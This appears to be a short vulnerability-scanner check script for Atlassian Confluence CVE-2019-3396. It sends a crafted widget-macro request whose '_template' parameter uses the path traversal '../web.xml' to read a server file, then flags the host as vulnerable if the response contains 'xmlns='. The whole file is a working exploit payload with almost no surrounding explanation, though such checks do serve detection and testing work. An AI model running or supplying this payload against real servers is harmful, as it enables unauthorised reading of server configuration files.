#request url = var
#define payload = /rest/tinymce/1/macro/preview
#define bug =  xmlns=
#define info = 存在Atlassian Confluence 路径穿越与命令执行漏洞（CVE-2019-3396）
#define post = {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
function main(args)
{
	res = HttpPut(url.payload,post,"Content-Type: application/json".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0".StrRN()."Authorization: Digest username=admin");//admin是用户名
	if(StrFindStr(res[0],bug,0)!= "-1")
	{
		print(url.info);
	}
}
